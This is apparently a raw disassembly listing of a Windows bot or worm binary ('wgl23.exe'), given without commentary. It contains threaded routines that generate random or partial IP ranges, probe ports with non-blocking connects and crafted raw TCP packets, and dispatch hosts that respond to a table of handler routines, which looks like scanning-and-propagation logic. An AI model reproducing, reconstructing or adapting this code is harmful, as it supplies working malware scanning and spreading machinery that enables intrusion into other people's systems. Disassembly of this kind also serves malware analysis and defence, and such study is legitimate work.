jnz loc_40C3EC
mov eax, dword_440078
push edi
mov esi, offset dword_4E643C
push 104h
push esi
push ebx
mov dword_4E664C, eax
mov dword_4E6648, ebx
call ds:dword_4F6378 ; GetModuleFileNameA
mov edi, offset Str ; "wgl23.exe"
push 103h ; Count
push edi ; Source
push offset byte_4E6540 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4E6438, eax
mov eax, [ebp+arg_138]
push 7Fh ; Count
mov dword_4E66D0, eax
jnz short loc_40C218
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4E6650 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E66D4, 1
jmp short loc_40C232
; ---------------------------------------------------------------------------
loc_40C218: ; CODE XREF: sub_40C165+94�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4E6650 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E66D4, ebx
loc_40C232: ; CODE XREF: sub_40C165+B1�j
push esi
lea eax, [ebp+Source]
push dword_4E664C
push offset asc_449768 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 5 ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov dword_4E6644, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E6438
push offset sub_41224F
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, dword_4E6644
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40C2A0
loc_40C28E: ; CODE XREF: sub_40C165+139�j
cmp dword_4E66D8, ebx
jnz short loc_40C2BB
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40C28E
; ---------------------------------------------------------------------------
loc_40C2A0: ; CODE XREF: sub_40C165+127�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_44979C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C2BB: ; CODE XREF: sub_40C165+12F�j
lea eax, [ebp+Source]
push eax
call sub_415C77
mov eax, dword_4E3F28
mov esi, offset dword_4E66E4
mov [esp+210h+var_210], 104h
push esi
push ebx
mov dword_4E68F4, eax
mov dword_4E68F0, ebx
call ds:dword_4F6378 ; GetModuleFileNameA
push 103h ; Count
push edi ; Source
push offset byte_4E67E8 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4E66E0, eax
mov eax, [ebp+arg_138]
pop edi
mov dword_4E6978, eax
push 7Fh ; Count
jnz short loc_40C33C
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4E68F8 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E697C, 1
jmp short loc_40C356
; ---------------------------------------------------------------------------
loc_40C33C: ; CODE XREF: sub_40C165+1B8�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4E68F8 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E697C, ebx
loc_40C356: ; CODE XREF: sub_40C165+1D5�j
push esi
lea eax, [ebp+Source]
push dword_4E68F4
push offset asc_4497D0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 4 ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov dword_4E68EC, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E66E0
push offset sub_40F43A
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, dword_4E68EC
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40C3C4
loc_40C3B2: ; CODE XREF: sub_40C165+25D�j
cmp dword_4E6980, ebx
jnz short loc_40C3DF
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40C3B2
; ---------------------------------------------------------------------------
loc_40C3C4: ; CODE XREF: sub_40C165+24B�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_449804 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C3DF: ; CODE XREF: sub_40C165+253�j
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
loc_40C3EC: ; CODE XREF: sub_40C165+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp dword_44925C[ecx], ebx
jz loc_40C515
push 7
call sub_40B9D6
test eax, eax
pop ecx
jnz loc_40C50F
mov eax, dword_4E6F94
cmp [ebp+arg_90], bl
mov dword_4E63A4, eax
mov eax, [ebp+arg_110]
mov dword_4E6398, eax
mov eax, [ebp+arg_138]
mov dword_4E63A0, ebx
mov dword_4E6428, eax
push 7Fh ; Count
jnz short loc_40C460
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4E63A8 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E642C, 1
jmp short loc_40C47A
; ---------------------------------------------------------------------------
loc_40C460: ; CODE XREF: sub_40C165+2DC�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4E63A8 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E642C, ebx
loc_40C47A: ; CODE XREF: sub_40C165+2F9�j
push dword_4E63A4
lea eax, [ebp+Source]
push offset asc_449838 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 7 ; int
push eax ; Source
call sub_40B78E
add esp, 18h
mov dword_4E639C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E6398
push offset sub_40F198
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, dword_4E639C
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40C4E7
loc_40C4D5: ; CODE XREF: sub_40C165+380�j
cmp dword_4E6430, ebx
jnz short loc_40C502
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40C4D5
; ---------------------------------------------------------------------------
loc_40C4E7: ; CODE XREF: sub_40C165+36E�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_449868 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C502: ; CODE XREF: sub_40C165+376�j
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
loc_40C50F: ; CODE XREF: sub_40C165+2A8�j
mov eax, [ebp+arg_130]
loc_40C515: ; CODE XREF: sub_40C165+298�j
shl eax, 6
cmp dword_449258[eax], ebx
jz loc_40C637
push 3
call sub_40B9D6
test eax, eax
pop ecx
jnz loc_40C637
mov esi, offset byte_4E6C14
push 104h
push esi
push ebx
call ds:dword_4F6378 ; GetModuleFileNameA
push 5Ch ; Ch
push esi ; Str
call _strrchr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40C556
mov [eax], bl
loc_40C556: ; CODE XREF: sub_40C165+3ED�j
mov eax, dword_44007C
mov dword_4E6D2C, ebx
mov dword_4E6D18, eax
lea eax, [ebp+Format]
push eax ; Format
push offset byte_4E698C ; Dest
call _sprintf
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_4E6988, eax
mov ecx, [ebp+arg_138]
push esi
push dword_4E6D18
mov dword_4E6D24, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4E6D28, ecx
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Source]
push offset asc_4498A0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov dword_4E6D20, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E6988
push offset sub_40FB88
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, dword_4E6D20
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40C60F
loc_40C5FD: ; CODE XREF: sub_40C165+4A8�j
cmp dword_4E6D34, ebx
jnz short loc_40C62A
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40C5FD
; ---------------------------------------------------------------------------
loc_40C60F: ; CODE XREF: sub_40C165+496�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_4498DC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C62A: ; CODE XREF: sub_40C165+49E�j
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
loc_40C637: ; CODE XREF: sub_40C165+14�j
; sub_40C165+25�j ...
pop esi
pop ebx
leave
retn
sub_40C165 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C63B(int Dst)
sub_40C63B proc near ; CODE XREF: sub_40C989:loc_40C9FA�p
Dst = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+Dst]
push esi
push 4 ; Size
lea esi, dword_4E4380[eax*8]
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4E4148 ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_4E421C ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40C63B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C683(char *Src,int)
sub_40C683 proc near ; CODE XREF: sub_40C989+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+Src] ; Str
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call _strlen
cmp eax, 0Fh
pop ecx
jbe short loc_40C6AB
xor eax, eax
jmp short loc_40C71C
; ---------------------------------------------------------------------------
loc_40C6AB: ; CODE XREF: sub_40C683+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push [ebp+Src] ; Src
call _sscanf
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40C6D8
call _rand
mov [ebp+var_C], eax
loc_40C6D8: ; CODE XREF: sub_40C683+4B�j
cmp [ebp+var_8], esi
jnz short loc_40C6E5
call _rand
mov [ebp+var_8], eax
loc_40C6E5: ; CODE XREF: sub_40C683+58�j
cmp [ebp+var_4], esi
jnz short loc_40C6F2
call _rand
mov [ebp+var_4], eax
loc_40C6F2: ; CODE XREF: sub_40C683+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40C6FE
call _rand
loc_40C6FE: ; CODE XREF: sub_40C683+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4E4380[ecx*8], eax
loc_40C71C: ; CODE XREF: sub_40C683+26�j
pop esi
leave
retn
sub_40C683 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C71F proc near ; CODE XREF: sub_40BF39+59�p
; sub_40C989+BB�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_4E42A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C748
xor eax, eax
jmp short loc_40C7B7
; ---------------------------------------------------------------------------
loc_40C748: ; CODE XREF: sub_40C71F+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4E4220 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4E42BC ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4E4208 ; select
push esi
mov edi, eax
call dword_4E42B8 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40C7B7: ; CODE XREF: sub_40C71F+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C71F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 10110h
call __alloca_probe
push ebx
push esi
push edi
mov edi, 2649h
push edi
call dword_4E4220 ; htons
push dword ptr [ebp+10h]
mov [ebp-28h], ax
call dword_4E4220 ; htons
mov [ebp-26h], ax
call _rand
xor ebx, ebx
push 200h
mov [ebp-24h], eax
mov [ebp-20h], ebx
mov [ebp-1Ch], bx
mov [ebp-0Ch], bx
mov word ptr [ebp-1Ah], 5
mov [ebp-18h], bx
mov word ptr [ebp-16h], 1
mov [ebp-14h], bx
mov [ebp-12h], bx
mov [ebp-10h], bx
mov [ebp-0Eh], bx
call dword_4E4220 ; htons
mov esi, [ebp+0Ch]
mov [ebp-0Ah], ax
mov eax, [ebp+8]
push 24h
mov [ebp-8], bx
mov [ebp-6], bx
mov [ebp-58h], eax
mov [ebp-54h], esi
mov [ebp-50h], bl
mov byte ptr [ebp-4Fh], 6
call dword_4E4220 ; htons
mov [ebp-4Eh], ax
lea eax, [ebp-28h]
push 24h
push eax
lea eax, [ebp-4Ch]
push eax
call _memcpy
lea eax, [ebp-58h]
push 20h
push eax
call sub_40B002
mov [ebp-8], ax
push 10h
lea eax, [ebp-38h]
push ebx
push eax
call _memset
add esp, 20h
mov word ptr [ebp-38h], 2
push dword ptr [ebp+10h]
call dword_4E4220 ; htons
push 6
push 3
push 2
mov [ebp-36h], ax
mov [ebp-34h], esi
mov dword ptr [ebp-4], 10h
call dword_4E42A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C8BB
push offset aSocketOpenFail ; "socket open failed"
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_40C8BB: ; CODE XREF: .text:0040C8AF�j
push dword ptr [ebp-4]
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-28h]
push 24h
push eax
push esi
call dword_4E4284 ; sendto
cmp eax, 14h
mov [ebp+10h], eax
jz short loc_40C904
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp-0D8h]
push dword ptr [ebp+10h]
push offset aSendtoSocketFa ; "sendto() socket failed. sent = %d <%d>."...
push eax
call _sprintf
lea eax, [ebp-0D8h]
push eax
call sub_415C77
add esp, 14h
jmp short loc_40C94D
; ---------------------------------------------------------------------------
loc_40C904: ; CODE XREF: .text:0040C8D6�j
push 10038h
lea eax, [ebp-10110h]
push ebx
push eax
call _memset
add esp, 0Ch
loc_40C919: ; CODE XREF: .text:0040C940�j
cmp [ebp-100FAh], di
jz short loc_40C956
lea eax, [ebp-4]
push eax
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-10110h]
push 10038h
push eax
push esi
call dword_4E41F8 ; recvfrom
test eax, eax
jge short loc_40C919
push offset aRecvfromSocket ; "recvfrom() socket failed"
call sub_415C77
pop ecx
loc_40C94D: ; CODE XREF: .text:0040C902�j
push esi
call dword_4E42B8 ; closesocket
jmp short loc_40C982
; ---------------------------------------------------------------------------
loc_40C956: ; CODE XREF: .text:0040C920�j
push esi
call dword_4E42B8 ; closesocket
cmp word ptr [ebp-100EAh], 1
jnz short loc_40C977
push offset aSocketOpen_ ; "Socket open."
call sub_415C77
pop ecx
push 1
pop eax
jmp short loc_40C984
; ---------------------------------------------------------------------------
loc_40C977: ; CODE XREF: .text:0040C965�j
push offset aSocketClosed_ ; "Socket closed."
loc_40C97C: ; CODE XREF: .text:0040C8B6�j
call sub_415C77
pop ecx
loc_40C982: ; CODE XREF: .text:0040C954�j
xor eax, eax
loc_40C984: ; CODE XREF: .text:0040C975�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C989 proc near ; DATA XREF: sub_40CBA1+13B�o
var_2A8 = dword ptr -2A8h
Dest = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
Src = byte ptr -150h
var_140 = byte ptr -140h
Str = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+Src]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
mov ebx, esi
pop ecx
imul ebx, 234h
loc_40C9D0: ; CODE XREF: sub_40C989+204�j
mov eax, dword_45712C[ebx]
cmp dword_4E4384[eax*8], 0
jz loc_40CB92
cmp [ebp+var_10], 0
push eax ; Dst
jz short loc_40C9FA
lea eax, [ebp+Src]
push eax ; Src
call sub_40C683
pop ecx
jmp short loc_40C9FF
; ---------------------------------------------------------------------------
loc_40C9FA: ; CODE XREF: sub_40C989+60�j
call sub_40C63B
loc_40C9FF: ; CODE XREF: sub_40C989+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_45712C[ebx]
push [ebp+var_3C]
push edi
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_449994 ; "-"
push eax ; Dest
call _sprintf
add esp, 18h
lea eax, [ebp+Dest]
push eax ; Format
lea eax, dword_456F28[ebx]
push eax ; Dest
call _sprintf
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40C71F
add esp, 14h
cmp eax, 1
jnz loc_40CB82
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40CAD6
push offset dword_4E6380
call ds:dword_4F63DC ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_4499CC ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40CAB8
cmp [ebp+Str], 0
push 1 ; int
push [ebp+var_18] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
jnz short loc_40CAAC
lea eax, [ebp+var_140]
loc_40CAAC: ; CODE XREF: sub_40C989+11B�j
push eax ; Str
push [ebp+var_40] ; int
call sub_409D6C
add esp, 14h
loc_40CAB8: ; CODE XREF: sub_40C989+100�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
mov [esp+2A8h+var_2A8], offset dword_4E6380
call ds:dword_4F63D8 ; RtlLeaveCriticalSection
jmp loc_40CB82
; ---------------------------------------------------------------------------
loc_40CAD6: ; CODE XREF: sub_40C989+D0�j
push edi
call dword_4E42AC ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_208]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_20]
pop ecx
shl eax, 6
pop ecx
add eax, offset aSym ; "sym"
push eax ; Format
lea eax, [ebp+var_178]
push eax ; Dest
call _sprintf
cmp [ebp+Str], 0
pop ecx
pop ecx
lea eax, [ebp+Str]
jnz short loc_40CB1B
lea eax, [ebp+var_140]
loc_40CB1B: ; CODE XREF: sub_40C989+18A�j
push eax ; Format
lea eax, [ebp+var_1F8]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call off_44924C[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40CB82: ; CODE XREF: sub_40C989+C6�j
; sub_40C989+148�j
push 7D0h
call ds:dword_4F6380 ; Sleep
jmp loc_40C9D0
; ---------------------------------------------------------------------------
loc_40CB92: ; CODE XREF: sub_40C989+55�j
push esi
call sub_40BAAA
pop ecx
push 0
call ds:dword_4F63D4 ; ExitThread
sub_40C989 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CBA1 proc near ; DATA XREF: sub_401CC7+1F44�o
; sub_401CC7+5DAA�o
var_1DC = dword ptr -1DCh
Source = byte ptr -1CCh
var_14C = byte ptr -14Ch
Str = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_4E4260 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_4E4380[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40C165
push 0Bh
call sub_40B9D6
add esp, 150h
cmp eax, ebx
jnz short loc_40CC6F
mov esi, offset dword_4E6380
push esi
call ds:dword_4F63E4 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4F63E0 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40CC6F
lea eax, [ebp+Source]
push offset asc_4499F4 ; "-"
push eax ; Dest
call _sprintf
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40CC59
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_409D6C
add esp, 14h
loc_40CC59: ; CODE XREF: sub_40CBA1+99�j
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40CC6F: ; CODE XREF: sub_40CBA1+63�j
; sub_40CBA1+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_4F6380
mov edi, ebx
mov dword_4E4384[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_40CD3C
loc_40CC8D: ; CODE XREF: sub_40CBA1+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+Source]
push offset asc_449A28 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 0Bh ; int
push eax ; Source
call sub_40B78E
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_45712C[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40C989
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40CD07
loc_40CCFC: ; CODE XREF: sub_40CBA1+164�j
cmp [ebp+var_4], ebx
jnz short loc_40CD2E
push 1Eh
call esi ; Sleep
jmp short loc_40CCFC
; ---------------------------------------------------------------------------
loc_40CD07: ; CODE XREF: sub_40CBA1+159�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_449A5C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415C77
add esp, 10h
loc_40CD2E: ; CODE XREF: sub_40CBA1+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40CC8D
loc_40CD3C: ; CODE XREF: sub_40CBA1+E6�j
cmp [ebp+var_30], ebx
jz loc_40CDE6
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_40CD51: ; CODE XREF: sub_40CBA1+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4E4380[eax*8]
push eax
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_449A94 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40CD9F
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_409D6C
add esp, 14h
loc_40CD9F: ; CODE XREF: sub_40CBA1+1DF�j
lea eax, [ebp+Source]
push eax
call sub_415C77
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_4E4384[eax*8], ebx
call esi ; Sleep
push 0Bh
call sub_40B9D6
cmp eax, 1
pop ecx
jnz short loc_40CDD6
push offset dword_4E6380
call ds:dword_4F63E4 ; RtlDeleteCriticalSection
loc_40CDD6: ; CODE XREF: sub_40CBA1+228�j
push [ebp+var_2C]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_40CDE6: ; CODE XREF: sub_40CBA1+19E�j
; sub_40CBA1+25D�j
mov eax, [ebp+var_2C]
cmp dword_4E4384[eax*8], 1
jnz loc_40CD51
push 7D0h
call esi ; Sleep
jmp short loc_40CDE6
sub_40CBA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CE00 proc near ; DATA XREF: sub_40CECD+7B�o
; sub_40CFBE+7B�o
var_BC = dword ptr -0BCh
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0BCh
mov eax, [ebp+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+var_BC]
push 1
rep movsd
pop esi
mov [eax+0A8h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_38]
call dword_4E4220 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_4E42A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40CEBE
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_457134[ecx], esi
jz short loc_40CEBE
push [ebp+var_38]
push [ebp+var_28]
call dword_4E42AC ; inet_ntoa
push eax
mov edi, offset byte_4E6D44
push offset asc_449AD4 ; "-"
push edi ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Str]
push [ebp+var_20] ; int
push edi ; int
push eax ; Str
push [ebp+var_BC] ; int
call sub_409D6C
push edi
call sub_415C77
add esp, 28h
loc_40CEBE: ; CODE XREF: sub_40CE00+5D�j
; sub_40CE00+7E�j
push esi
call dword_4E42B8 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40CE00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; int __cdecl sub_40CECD(int Dst)
sub_40CECD proc near ; DATA XREF: sub_401CC7+6190�o
Dest = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
Src = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
push ebx
mov ebx, [ebp+Dst]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B4]
rep movsd
mov esi, ds:dword_4F6380
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CEFB: ; CODE XREF: sub_40CECD+EC�j
push [ebp+var_30]
push [ebp+Src]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_449AFC ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_456F28
push eax ; Dest
call _strncpy
add esp, 1Ch
